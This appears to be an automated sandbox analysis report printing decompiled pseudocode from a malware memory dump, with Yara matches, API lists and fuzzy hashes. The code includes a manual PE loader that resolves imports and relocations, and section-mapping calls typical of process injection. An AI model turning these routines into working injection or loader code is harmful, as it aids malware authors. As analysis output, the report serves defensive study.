                                    						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                    						__eflags =  *_t76;
                                    						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                    						_t184 =  *_t78;
                                    						_t79 = _t272 + 0x2c; // 0x8df075ff
                                    						_t239 =  *_t79;
                                    					} else {
                                    						 *(_t272 + 0x16b0) = 2;
                                    						_t61 = _t272 + 0x38; // 0xf47d8bff
                                    						memcpy( *_t61,  *_t142 - _t224, _t224);
                                    						_t62 = _t272 + 0x2c; // 0x8df075ff
                                    						_t184 =  *_t62;
                                    						_t273 = _t273 + 0xc;
                                    						_t225 = _a4;
                                    						_t239 = _t184;
                                    						 *(_t272 + 0x6c) = _t184;
                                    					}
                                    					_t254 = _t184;
                                    					 *(_t272 + 0x5c) = _t184;
                                    					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                                    					_t185 =  *_t81;
                                    					_t240 = _t239 - _t185;
                                    					_t241 =  <=  ? _t225 : _t240;
                                    					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                    					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                    				}
                                    				if( *(_t272 + 0x16c0) < _t254) {
                                    					 *(_t272 + 0x16c0) = _t254;
                                    				}
                                    				if(_t269 == 0) {
                                    					_t218 = _a8;
                                    					__eflags = _t218;
                                    					if(_t218 == 0) {
                                    						L34:
                                    						_t89 = _t272 + 0x3c; // 0x830cc483
                                    						_t219 =  *_t272;
                                    						_t145 =  *_t89 - _t254 - 1;
                                    						_a4 =  *_t272;
                                    						_t234 = _t254;
                                    						_v16 = _t145;
                                    						_v8 = _t254;
                                    						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                    						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                    							_v8 = _t254;
                                    							_t95 = _t272 + 0x5c; // 0x84e85000
                                    							_a4 = _t219;
                                    							_t234 = _t254;
                                    							_t97 = _t272 + 0x2c; // 0x8df075ff
                                    							__eflags =  *_t95 -  *_t97;
                                    							if( *_t95 >=  *_t97) {
                                    								_t98 = _t272 + 0x2c; // 0x8df075ff
                                    								_t167 =  *_t98;
                                    								_t259 = _t254 - _t167;
                                    								_t99 = _t272 + 0x38; // 0xf47d8bff
                                    								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                    								 *(_t272 + 0x6c) = _t259;
                                    								memcpy( *_t99, _t167 +  *_t99, _t259);
                                    								_t103 = _t272 + 0x16b0; // 0xdf750008
                                    								_t170 =  *_t103;
                                    								_t273 = _t273 + 0xc;
                                    								__eflags = _t170 - 2;
                                    								if(_t170 < 2) {
                                    									_t172 = _t170 + 1;
                                    									__eflags = _t172;
                                    									 *(_t272 + 0x16b0) = _t172;
                                    								}
                                    								_t106 = _t272 + 0x2c; // 0x8df075ff
                                    								_t145 = _v16 +  *_t106;
                                    								__eflags = _t145;
                                    								_a4 =  *_t272;
                                    								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                    								_t234 =  *_t108;
                                    								_v8 = _t234;
                                    							}
                                    						}
                                    						_t255 = _a4;
                                    						_t220 =  *((intOrPtr*)(_a4 + 4));
                                    						__eflags = _t145 - _t220;
                                    						_t221 =  <=  ? _t145 : _t220;
                                    						_t146 = _t221;
                                    						_a4 = _t221;
                                    						_t222 = _a8;
                                    						__eflags = _t146;
                                    						if(_t146 != 0) {
                                    							_t114 = _t272 + 0x38; // 0xf47d8bff
                                    							E000D4C30(_t255,  *_t114 + _v8, _t146);
                                    							_t273 = _t273 + 0xc;
                                    							_t117 = _t272 + 0x6c;
                                    							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                    							__eflags =  *_t117;
                                    							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                    							_t234 =  *_t119;
                                    						}
                                    						__eflags =  *(_t272 + 0x16c0) - _t234;
                                    						if( *(_t272 + 0x16c0) < _t234) {
                                    							 *(_t272 + 0x16c0) = _t234;
                                    						}
                                    						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                                    						_t123 = _t272 + 0xc; // 0x452bf84d
                                    						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                    						__eflags = _t257 - 0xffff;
                                    						_t258 =  >  ? 0xffff : _t257;
                                    						_t124 = _t272 + 0x2c; // 0x8df075ff
                                    						_t151 =  *_t124;
                                    						_t125 = _t272 + 0x5c; // 0x84e85000
                                    						_t235 = _t234 -  *_t125;
                                    						__eflags = _t258 - _t151;
                                    						_t152 =  <=  ? _t258 : _t151;
                                    						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                    						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                    							L49:
                                    							__eflags = _t235 - _t258;
                                    							_t154 =  >  ? _t258 : _t235;
                                    							_a4 =  >  ? _t258 : _t235;
                                    							__eflags = _t222 - 4;
                                    							if(_t222 != 4) {
                                    								L53:
                                    								_t269 = 0;
                                    								__eflags = 0;
                                    							} else {
                                    								_t161 =  *_t272;
                                    								__eflags =  *(_t161 + 4);
                                    								_t154 = _a4;
                                    								if( *(_t161 + 4) != 0) {
                                    									goto L53;
                                    								} else {
                                    									__eflags = _t154 - _t235;
                                    									if(_t154 != _t235) {
                                    										goto L53;
                                    									} else {
                                    										_t269 = _t222 - 3;
                                    									}
                                    								}
                                    							}
                                    							_t131 = _t272 + 0x38; // 0xf47d8bff
                                    							_t132 = _t272 + 0x5c; // 0x84e85000
                                    							E000D5D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                    							_t134 = _t272 + 0x5c;
                                    							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                    							__eflags =  *_t134;
                                    							E000D4AF0( *_t134,  *_t272);
                                    						} else {
                                    							__eflags = _t235;
                                    							if(_t235 != 0) {
                                    								L46:
                                    								__eflags = _t222;
                                    								if(_t222 != 0) {
                                    									_t162 =  *_t272;
                                    									__eflags =  *(_t162 + 4);
                                    									if( *(_t162 + 4) == 0) {
                                    										__eflags = _t235 - _t258;
                                    										if(_t235 <= _t258) {
                                    											goto L49;
                                    										}
                                    									}
                                    								}
                                    							} else {
                                    								__eflags = _t222 - 4;
                                    								if(_t222 == 4) {
                                    									goto L46;
                                    								}
                                    							}
                                    						}
                                    						asm("sbb edi, edi");
                                    						_t271 =  ~_t269 & 0x00000002;
                                    						__eflags = _t271;
                                    						return _t271;
                                    					} else {
                                    						__eflags = _t218 - 4;
                                    						if(_t218 == 4) {
                                    							goto L34;
                                    						} else {
                                    							_t173 =  *_t272;
                                    							__eflags =  *(_t173 + 4);
                                    							if( *(_t173 + 4) != 0) {
                                    								goto L34;
                                    							} else {
                                    								_t88 = _t272 + 0x5c; // 0x84e85000
                                    								__eflags = _t254 -  *_t88;
                                    								if(_t254 !=  *_t88) {
                                    									goto L34;
                                    								} else {
                                    									return 1;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				} else {
                                    					return 3;
                                    				}
                                    			}

                                    0x000d2e34
                                    0x000d2e3a
                                    0x000d2e3f
                                    0x000d2e42
                                    0x000d2e48
                                    0x000d2e4d
                                    0x000d2e53
                                    0x000d2e59
                                    0x000d2e5e
                                    0x000d2e61
                                    0x000d2e66
                                    0x000d2e6a
                                    0x000d2e6e
                                    0x000d2e71
                                    0x000d2e74
                                    0x000d2e7d
                                    0x000d2e84
                                    0x000d2e87
                                    0x000d2e8a
                                    0x000d2e8f
                                    0x000d2e94
                                    0x000d2e97
                                    0x000d2e9a
                                    0x000d2e9a
                                    0x000d2e9e
                                    0x000d2ea7
                                    0x000d2eae
                                    0x000d2eb1
                                    0x000d2eb6
                                    0x000d2ebb
                                    0x000d2ebb
                                    0x000d2ebe
                                    0x000d2ec3
                                    0x00000000
                                    0x00000000
                                    0x000d2de7
                                    0x000d2de9
                                    0x000d2df6
                                    0x00000000
                                    0x00000000
                                    0x000d2df6
                                    0x000d2de9
                                    0x00000000
                                    0x000d2de5
                                    0x000d2ec9
                                    0x000d2ece
                                    0x000d2ed1
                                    0x000d2ed4
                                    0x000d2f7f
                                    0x000d2f7f
                                    0x000d2eda
                                    0x000d2eda
                                    0x000d2eda
                                    0x000d2edf
                                    0x000d2f09
                                    0x000d2f0c
                                    0x000d2f0c
                                    0x000d2f11
                                    0x000d2f13
                                    0x000d2f15
                                    0x000d2f18
                                    0x000d2f1b
                                    0x000d2f23
                                    0x000d2f28
                                    0x000d2f28
                                    0x000d2f2e
                                    0x000d2f31
                                    0x000d2f34
                                    0x000d2f37
                                    0x000d2f39
                                    0x000d2f39
                                    0x000d2f3a
                                    0x000d2f3a
                                    0x000d2f37
                                    0x000d2f48
                                    0x000d2f4b
                                    0x000d2f4f
                                    0x000d2f54
                                    0x000d2f57
                                    0x000d2f5a
                                    0x000d2f5a
                                    0x000d2f5a
                                    0x000d2f5d
                                    0x000d2f5d
                                    0x000d2f60
                                    0x000d2f60
                                    0x000d2ee1
                                    0x000d2ee1
                                    0x000d2ef1
                                    0x000d2ef4
                                    0x000d2ef9
                                    0x000d2ef9
                                    0x000d2efc
                                    0x000d2eff
                                    0x000d2f02
                                    0x000d2f04
                                    0x000d2f04
                                    0x000d2f63
                                    0x000d2f65
                                    0x000d2f68
                                    0x000d2f68
                                    0x000d2f6e
                                    0x000d2f72
                                    0x000d2f75
                                    0x000d2f77
                                    0x000d2f77
                                    0x000d2f88
                                    0x000d2f8a
                                    0x000d2f8a
                                    0x000d2f92
                                    0x000d2fa0
                                    0x000d2fa3
                                    0x000d2fa5
                                    0x000d2fc5
                                    0x000d2fc5
                                    0x000d2fc8
                                    0x000d2fce
                                    0x000d2fcf
                                    0x000d2fd2
                                    0x000d2fd4
                                    0x000d2fd7
                                    0x000d2fda
                                    0x000d2fdd
                                    0x000d2fe1
                                    0x000d2fe4
                                    0x000d2fe7
                                    0x000d2fea
                                    0x000d2fec
                                    0x000d2fec
                                    0x000d2fef
                                    0x000d2ff1
                                    0x000d2ff1
                                    0x000d2ff4
                                    0x000d2ff6
                                    0x000d2ff9
                                    0x000d3001
                                    0x000d3004
                                    0x000d3009
                                    0x000d3009
                                    0x000d300f
                                    0x000d3012
                                    0x000d3015
                                    0x000d3017
                                    0x000d3017
                                    0x000d3018
                                    0x000d3018
                                    0x000d3023
                                    0x000d3023
                                    0x000d3023
                                    0x000d3026
                                    0x000d3029
                                    0x000d3029
                                    0x000d302c
                                    0x000d302c
                                    0x000d2fef
                                    0x000d302f
                                    0x000d3032
                                    0x000d3035
                                    0x000d3037
                                    0x000d303a
                                    0x000d303c
                                    0x000d303f
                                    0x000d3042
                                    0x000d3044
                                    0x000d3047
                                    0x000d304f
                                    0x000d3057
                                    0x000d305a
                                    0x000d305a
                                    0x000d305a
                                    0x000d305d
                                    0x000d305d
                                    0x000d305d
                                    0x000d3060
                                    0x000d3066
                                    0x000d3068
                                    0x000d3068
                                    0x000d306e
                                    0x000d3074
                                    0x000d307d
                                    0x000d3084
                                    0x000d3086
                                    0x000d3089
                                    0x000d3089
                                    0x000d308c
                                    0x000d308c
                                    0x000d308f
                                    0x000d3091
                                    0x000d3094
                                    0x000d3096
                                    0x000d30b1
                                    0x000d30b1
                                    0x000d30b5
                                    0x000d30b8
                                    0x000d30bb
                                    0x000d30be
                                    0x000d30d4
                                    0x000d30d4
                                    0x000d30d4
                                    0x000d30c0
                                    0x000d30c0
                                    0x000d30c2
                                    0x000d30c6
                                    0x000d30c9
                                    0x00000000
                                    0x000d30cb
                                    0x000d30cb
                                    0x000d30cd
                                    0x00000000
                                    0x000d30cf
                                    0x000d30cf
                                    0x000d30cf
                                    0x000d30cd
                                    0x000d30c9
                                    0x000d30d8
                                    0x000d30db
                                    0x000d30e0
                                    0x000d30ea
                                    0x000d30ea
                                    0x000d30ea
                                    0x000d30ed
                                    0x000d3098
                                    0x000d3098
                                    0x000d309a
                                    0x000d30a1
                                    0x000d30a1
                                    0x000d30a3
                                    0x000d30a5
                                    0x000d30a7
                                    0x000d30ab
                                    0x000d30ad
                                    0x000d30af
                                    0x00000000
                                    0x00000000
                                    0x000d30af
                                    0x000d30ab
                                    0x000d309c
                                    0x000d309c
                                    0x000d309f
                                    0x00000000
                                    0x00000000
                                    0x000d309f
                                    0x000d309a
                                    0x000d30f7
                                    0x000d30f9
                                    0x000d30f9
                                    0x000d3104
                                    0x000d2fa7
                                    0x000d2fa7
                                    0x000d2faa
                                    0x00000000
                                    0x000d2fac
                                    0x000d2fac
                                    0x000d2fae
                                    0x000d2fb2
                                    0x00000000
                                    0x000d2fb4
                                    0x000d2fb4
                                    0x000d2fb4
                                    0x000d2fb7
                                    0x00000000
                                    0x000d2fbb
                                    0x000d2fc4
                                    0x000d2fc4
                                    0x000d2fb7
                                    0x000d2fb2
                                    0x000d2faa
                                    0x000d2f96
                                    0x000d2f9f
                                    0x000d2f9f

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: memcpy
                                    • String ID:
                                    • API String ID: 3510742995-0
                                    • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                    • Instruction ID: ada663c656bf4378222564d16f1058757340d539b71a268776186381d56c4217
                                    • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                    • Instruction Fuzzy Hash: B4D11375600B009FCB64CF6DD8D496ABBE1FF98304B24892EE88AC7705D771E9448B65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 52%
                                    			E000D2AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                    				signed int _v5;
                                    				signed short _v12;
                                    				intOrPtr* _v16;
                                    				signed int* _v20;
                                    				intOrPtr _v24;
                                    				unsigned int _v28;
                                    				signed short* _v32;
                                    				struct HINSTANCE__* _v36;
                                    				intOrPtr* _v40;
                                    				signed short* _v44;
                                    				intOrPtr _v48;
                                    				unsigned int _v52;
                                    				intOrPtr _v56;
                                    				_Unknown_base(*)()* _v60;
                                    				signed int _v64;
                                    				intOrPtr _v68;
                                    				intOrPtr _v72;
                                    				unsigned int _v76;
                                    				intOrPtr _v80;
                                    				signed int _v84;
                                    				intOrPtr _v88;
                                    				signed int _t149;
                                    				void* _t189;
                                    				signed int _t194;
                                    				signed int _t196;
                                    				intOrPtr _t236;
                                    
                                    				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                    				_v24 = _v72;
                                    				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                                    				_v56 = _t236;
                                    				if(_t236 == 0) {
                                    					L13:
                                    					while(0 != 0) {
                                    					}
                                    					_push(8);
                                    					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                                    						L35:
                                    						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                                    						while(0 != 0) {
                                    						}
                                    						if(_a12 != 0) {
                                    							 *_a12 = _v68;
                                    						}
                                    						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                                    						return _v68(_a4, 1, _a8);
                                    					}
                                    					_v84 = 0x80000000;
                                    					_t149 = 8;
                                    					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                                    					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                    						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                    						if(_v36 == 0) {
                                    							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                    						}
                                    						if(_v36 != 0) {
                                    							if( *_v16 == 0) {
                                    								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                    							} else {
                                    								_v20 =  *_v16 + _a4;
                                    							}
                                    							_v64 = _v64 & 0x00000000;
                                    							while( *_v20 != 0) {
                                    								if(( *_v20 & _v84) == 0) {
                                    									_v88 =  *_v20 + _a4;
                                    									_v60 = GetProcAddress(_v36, _v88 + 2);
                                    								} else {
                                    									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                                    								}
                                    								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                    									 *_v20 = _v60;
                                    								} else {
                                    									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                                    								}
                                    								_v20 =  &(_v20[1]);
                                    								_v64 = _v64 + 4;
                                    							}
                                    							_v16 = _v16 + 0x14;
                                    							continue;
                                    						} else {
                                    							_t189 = 0xfffffffd;
                                    							return _t189;
                                    						}
                                    					}
                                    					goto L35;
                                    				}
                                    				_t194 = 8;
                                    				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                                    				_t196 = 8;
                                    				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                                    				while(0 != 0) {
                                    				}
                                    				while(_v48 > 0) {
                                    					_v28 = _v44[2];
                                    					_v48 = _v48 - _v28;
                                    					_v28 = _v28 - 8;
                                    					_v28 = _v28 >> 1;
                                    					_v32 =  &(_v44[4]);
                                    					_v80 = _a4 +  *_v44;
                                    					_v52 = _v28;
                                    					while(1) {
                                    						_v76 = _v52;
                                    						_v52 = _v52 - 1;
                                    						if(_v76 == 0) {
                                    							break;
                                    						}
                                    						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                    						_v12 =  *_v32 & 0xfff;
                                    						_v40 = (_v12 & 0x0000ffff) + _v80;
                                    						if((_v5 & 0x000000ff) != 3) {
                                    							if((_v5 & 0x000000ff) == 0xa) {
                                    								 *_v40 =  *_v40 + _v56;
                                    							}
                                    						} else {
                                    							 *_v40 =  *_v40 + _v56;
                                    						}
                                    						_v32 =  &(_v32[1]);
                                    					}
                                    					_v44 = _v32;
                                    				}
                                    				goto L13;
                                    			}

                                    APIs
                                    • GetModuleHandleA.KERNEL32(?), ref: 000D2C4C
                                    • LoadLibraryA.KERNEL32(?), ref: 000D2C65
                                    • GetProcAddress.KERNEL32(00000000,890CC483), ref: 000D2CC1
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 000D2CE0
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleLibraryLoadModule
                                    • String ID:
                                    • API String ID: 384173800-0
                                    • Opcode ID: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
                                    • Instruction ID: 5402422793a648d839d8c1373124b4a30482a42bb4b40aad00deaa3b82b4c0c1
                                    • Opcode Fuzzy Hash: a54a24278918fea252380e465b505e286e532335ad0441f8fdbb0e591644a7db
                                    • Instruction Fuzzy Hash: 92A18A75A10209EFCB54CFA8C985AADBBF1FF08314F14845AE815EB361D774AA81CF64
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E000C1C68(signed int __ecx, void* __eflags, void* __fp0) {
                                    				char _v16;
                                    				intOrPtr _v20;
                                    				char _v24;
                                    				char _v28;
                                    				void* _t13;
                                    				intOrPtr _t15;
                                    				signed int _t16;
                                    				intOrPtr _t17;
                                    				signed int _t18;
                                    				char _t20;
                                    				intOrPtr _t22;
                                    				void* _t23;
                                    				void* _t24;
                                    				intOrPtr _t29;
                                    				intOrPtr _t35;
                                    				intOrPtr _t41;
                                    				intOrPtr _t43;
                                    				intOrPtr _t48;
                                    				void* _t51;
                                    				signed int _t61;
                                    				signed int _t64;
                                    				void* _t71;
                                    
                                    				_t71 = __fp0;
                                    				_t61 = __ecx;
                                    				_t41 =  *0xde6dc; // 0x1d4
                                    				_t13 = E000CA4BF(_t41, 0);
                                    				while(_t13 < 0) {
                                    					E000C980C( &_v28);
                                    					_t43 =  *0xde6e0; // 0x0
                                    					_t15 =  *0xde6e4; // 0x0
                                    					_t41 = _t43 + 0xe10;
                                    					asm("adc eax, ebx");
                                    					__eflags = _t15 - _v24;
                                    					if(__eflags > 0) {
                                    						L9:
                                    						_t16 = 0xfffffffe;
                                    						L13:
                                    						return _t16;
                                    					}
                                    					if(__eflags < 0) {
                                    						L4:
                                    						_t17 =  *0xde684; // 0x27bf8f0
                                    						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0xde6d0, 0);
                                    						__eflags = _t18;
                                    						if(_t18 == 0) {
                                    							break;
                                    						}
                                    						_t35 =  *0xde684; // 0x27bf8f0
                                    						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                                    						_t41 =  *0xde6dc; // 0x1d4
                                    						__eflags = 0;
                                    						_t13 = E000CA4BF(_t41, 0);
                                    						continue;
                                    					}
                                    					__eflags = _t41 - _v28;
                                    					if(_t41 >= _v28) {
                                    						goto L9;
                                    					}
                                    					goto L4;
                                    				}
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t20 =  *0xde6e8; // 0x27bffa8
                                    				_v28 = _t20;
                                    				_t22 = E000CA6A9(_t41, _t61,  &_v16);
                                    				_v20 = _t22;
                                    				if(_t22 != 0) {
                                    					_t23 = GetCurrentProcess();
                                    					_t24 = GetCurrentThread();
                                    					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0xde6d0, 0, 0, 2);
                                    					E000C980C(0xde6e0);
                                    					_t64 = E000C1A1B( &_v28, E000C1226, _t71);
                                    					__eflags = _t64;
                                    					if(_t64 >= 0) {
                                    						_push(0);
                                    						_push( *0xde760);
                                    						_t51 = 0x27;
                                    						E000C9F06(_t51);
                                    					}
                                    				} else {
                                    					_t64 = _t61 | 0xffffffff;
                                    				}
                                    				_t29 =  *0xde684; // 0x27bf8f0
                                    				 *((intOrPtr*)(_t29 + 0x30))( *0xde6d0);
                                    				_t48 =  *0xde6dc; // 0x1d4
                                    				 *0xde6d0 = 0;
                                    				E000CA4DB(_t48);
                                    				E000C861A( &_v24, 0);
                                    				_t16 = _t64;
                                    				goto L13;
                                    			}

                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c8d8e5c4664eac2527a7276f7899c789ab0069d66b9e98cb1343daa34874c73
                                    • Instruction ID: f2db016a6e86ac95650e658f1212804d8919bf6c937486c21d9280327b646b79
                                    • Opcode Fuzzy Hash: 4c8d8e5c4664eac2527a7276f7899c789ab0069d66b9e98cb1343daa34874c73
                                    • Instruction Fuzzy Hash: E731C732605244AFE354EF64EC85EAE77A9EB55390B10092FF901CB2E3DE38DC048766
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 73%
                                    			E000C1B2D(void* __eflags, void* __fp0) {
                                    				char _v24;
                                    				char _v28;
                                    				void* _t12;
                                    				intOrPtr _t14;
                                    				void* _t15;
                                    				intOrPtr _t16;
                                    				void* _t17;
                                    				void* _t19;
                                    				void* _t20;
                                    				char _t24;
                                    				intOrPtr _t26;
                                    				intOrPtr _t28;
                                    				intOrPtr _t33;
                                    				intOrPtr _t38;
                                    				intOrPtr _t40;
                                    				void* _t41;
                                    				intOrPtr _t46;
                                    				void* _t48;
                                    				intOrPtr _t51;
                                    				void* _t61;
                                    				void* _t71;
                                    
                                    				_t71 = __fp0;
                                    				_t38 =  *0xde6f4; // 0x1d0
                                    				_t12 = E000CA4BF(_t38, 0);
                                    				while(_t12 < 0) {
                                    					E000C980C( &_v28);
                                    					_t40 =  *0xde700; // 0x0
                                    					_t14 =  *0xde704; // 0x0
                                    					_t41 = _t40 + 0x3840;
                                    					asm("adc eax, ebx");
                                    					__eflags = _t14 - _v24;
                                    					if(__eflags > 0) {
                                    						L13:
                                    						_t15 = 0;
                                    					} else {
                                    						if(__eflags < 0) {
                                    							L4:
                                    							_t16 =  *0xde684; // 0x27bf8f0
                                    							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0xde6ec, 0);
                                    							__eflags = _t17;
                                    							if(_t17 == 0) {
                                    								break;
                                    							} else {
                                    								_t33 =  *0xde684; // 0x27bf8f0
                                    								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                                    								_t51 =  *0xde6f4; // 0x1d0
                                    								__eflags = 0;
                                    								_t12 = E000CA4BF(_t51, 0);
                                    								continue;
                                    							}
                                    						} else {
                                    							__eflags = _t41 - _v28;
                                    							if(_t41 >= _v28) {
                                    								goto L13;
                                    							} else {
                                    								goto L4;
                                    							}
                                    						}
                                    					}
                                    					L12:
                                    					return _t15;
                                    				}
                                    				E000C980C(0xde700);
                                    				_t19 = GetCurrentProcess();
                                    				_t20 = GetCurrentThread();
                                    				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0xde6ec, 0, 0, 2);
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t24 =  *0xde6e8; // 0x27bffa8
                                    				_v28 = _t24;
                                    				_t61 = E000C1A1B( &_v28, E000C131E, _t71);
                                    				if(_t61 >= 0) {
                                    					_push(0);
                                    					_push( *0xde760);
                                    					_t48 = 0x27;
                                    					E000C9F06(_t48);
                                    				}
                                    				if(_v24 != 0) {
                                    					E000C6890( &_v24);
                                    				}
                                    				_t26 =  *0xde684; // 0x27bf8f0
                                    				 *((intOrPtr*)(_t26 + 0x30))( *0xde6ec);
                                    				_t28 =  *0xde758; // 0x0
                                    				 *0xde6ec = 0;
                                    				_t29 =  !=  ? 1 : _t28;
                                    				_t46 =  *0xde6f4; // 0x1d0
                                    				 *0xde758 =  !=  ? 1 : _t28;
                                    				E000CA4DB(_t46);
                                    				_t15 = _t61;
                                    				goto L12;
                                    			}

                                    APIs
                                    • GetCurrentProcess.KERNEL32(000DE6EC,00000000,00000000,00000002), ref: 000C1BCC
                                    • GetCurrentThread.KERNEL32(00000000), ref: 000C1BCF
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 000C1BD6
                                    • DuplicateHandle.KERNEL32 ref: 000C1BD9
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.881680838.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: Current$Process$DuplicateHandleThread
                                    • String ID:
                                    • API String ID: 3566409357-0
                                    • Opcode ID: 7432552202618214ff09496dd892babb79cb5ed6e1a56431ae5e527e25d11dc9
                                    • Instruction ID: 2b5b3560eca2b9c66e54fa8514e9480b8e1ea27dea2e81419eb01e222fcba38a
                                    • Opcode Fuzzy Hash: 7432552202618214ff09496dd892babb79cb5ed6e1a56431ae5e527e25d11dc9
                                    • Instruction Fuzzy Hash: C831A6716053419FE744FF64EC89EAE77A4EB55390B00456EF9018B2A3DA38DC04CB72
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Executed Functions

                                    C-Code - Quality: 86%
                                    			E1000C6C0(void* __ecx, intOrPtr __edx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				long _v24;
                                    				long _v28;
                                    				void* _v32;
                                    				intOrPtr _v36;
                                    				long _v40;
                                    				void* _v44;
                                    				char _v56;
                                    				char _v72;
                                    				struct _WNDCLASSEXA _v120;
                                    				void* _t69;
                                    				intOrPtr _t75;
                                    				struct HWND__* _t106;
                                    				intOrPtr* _t113;
                                    				struct _EXCEPTION_RECORD _t116;
                                    				void* _t126;
                                    				void* _t131;
                                    				intOrPtr _t134;
                                    				void* _t140;
                                    				void* _t141;
                                    
                                    				_t69 =  *0x1001e688; // 0x7900590
                                    				_t126 = __ecx;
                                    				_t134 = __edx;
                                    				_t116 = 0;
                                    				_v36 = __edx;
                                    				_v16 = 0;
                                    				_v44 = 0;
                                    				_v40 = 0;
                                    				_v12 = 0;
                                    				_v8 = 0;
                                    				_v24 = 0;
                                    				_v20 = __ecx;
                                    				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                                    					E1000E23E(0x1f4);
                                    					_t116 = 0;
                                    				}
                                    				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                    				_v28 = _t116;
                                    				if( *_t113 != 0x4550) {
                                    					L12:
                                    					if(_v8 != 0) {
                                    						_t75 =  *0x1001e780; // 0x797fbc8
                                    						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                                    						_v8 = _v8 & 0x00000000;
                                    					}
                                    					L14:
                                    					if(_v12 != 0) {
                                    						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
                                    					}
                                    					if(_v16 != 0) {
                                    						NtClose(_v16);
                                    					}
                                    					return _v8;
                                    				}
                                    				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                                    				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
                                    					goto L12;
                                    				}
                                    				_v120.style = 0xb;
                                    				_v120.cbSize = 0x30;
                                    				_v120.lpszClassName =  &_v56;
                                    				asm("movsd");
                                    				_v120.lpfnWndProc = DefWindowProcA;
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsb");
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsw");
                                    				asm("movsb");
                                    				_v120.cbWndExtra = 0;
                                    				_v120.lpszMenuName = 0;
                                    				_v120.cbClsExtra = 0;
                                    				_v120.hInstance = 0;
                                    				if(RegisterClassExA( &_v120) != 0) {
                                    					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
                                    					if(_t106 != 0) {
                                    						DestroyWindow(_t106); // executed
                                    						UnregisterClassA( &_v56, 0);
                                    					}
                                    				}
